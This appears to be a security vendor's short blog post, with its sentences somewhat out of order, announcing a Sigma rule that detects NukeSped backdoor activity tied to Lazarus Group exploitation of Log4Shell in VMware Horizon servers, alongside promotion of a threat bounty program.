View Detections Join Threat Bounty NukeSped Malware Analysis Eager to develop your own Sigma rules, increase your threat hunting velocity, and contribute to the global threat hunting initiatives? Join our Threat Bounty Program! Hit the View Detections button to browse through a rich library of detection content. The world’s leading Detection as Code platform has aggregated 185K+ detection algorithms and threat hunting queries for multiple security platforms. The detection is available for the 20 SIEM, EDR & XDR platforms, aligned with the latest MITRE ATT&CK® framework v.10, addressing the Execution tactic with Command and Scripting Interpreter (T1059) as the main technique. Possible Detection of Lazarus Group Exploiting Log4Shell Vulnerability (NukeSped) (via file_event) The rule enables detection of the possible malicious activity associated with NukeSped malware: Leverage a new Sigma rule by a keen Threat Bounty developer Sohan G, released in the Threat Detection Marketplace repository of SOC Prime’s platform. Almost half a year later, these exploits still remain a burning issue. First documented exploits date back to January 2022, with Lazarus hackers being spotted exploiting Log4Shell in VMware Horizons products since mid-Spring 2022. In this campaign, adversaries leverage Horizon, targeting the Republic of Korea with a NukeSped backdoor. State-run threat actor Lazarus rides again, this time exploiting the notorious Log4Shell vulnerability in VMware Horizons servers.
0 kommentar(er)
